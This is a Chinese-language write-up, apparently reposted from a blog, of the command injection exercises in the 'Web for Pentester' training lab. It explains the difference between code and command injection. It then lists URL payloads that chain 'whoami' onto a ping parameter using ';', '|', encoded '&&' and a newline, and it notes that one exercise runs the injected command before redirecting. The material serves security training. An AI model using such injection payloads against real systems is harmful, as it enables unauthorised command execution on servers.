Web for pentester_writeup之Commands injection篇

Web for pentester_writeup之Commands injection篇

Commands injection(命令行注入)

代码注入和命令行注入有什么区别呢,代码注入涉及比较广泛,凡是由于过滤不严格或者是逻辑问题导致的可以插入恶意代码,都属于代码注入。而命令注入就局限于system函数的过滤不严格导致执行了系统命令。
总之就是代码注入主要是执行php代码,而命令注入主要是执行系统命令。

Example 1

1605154-20190808152219622-972400476.png

这是一个简单的命令注入,执行的是ping一个ip的命令,这里我们可以使用;|符号来拼接执行后面的命令,也可以使用&&符号(需编码)。

Payload 1
http://192.168.219.136/commandexec/example1.php?ip=127.0.0.1;whoami

1605154-20190808150936709-1120481114.png

Payload2
http://192.168.219.136/commandexec/example1.php?ip=127.0.0.1|whoami

1605154-20190808151020397-112813302.png

Payload3
http://192.168.219.136/commandexec/example1.php?ip=127.0.0.1%26%26whoami

1605154-20190808151628051-917874083.jpg

Example 2

1605154-20190808151229918-1544430189.png

对IP地址参数做了相关过滤限制,这里我们使用%0a换行符来切换命令至下一行执行

Payload
http://192.168.219.136/commandexec/example2.php?ip=127.0.0.1%0awhoami

1605154-20190808151243570-1671194848.png

Example 3

1605154-20190808151259336-212764441.jpg

我们发现换行符也不好使了,开启抓包模式,抓包发现程序有个302跳转,程序在运行时无论输入什么命令都会跳转Location: example3.php?ip=127.0.0.1

1605154-20190808151313164-2075732125.png

查看返回数据包发现,跳转时已经执行了相关命令

1605154-20190808151320268-1858804467.png

转载于:https://www.cnblogs.com/liliyuanshangcao/p/11321325.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值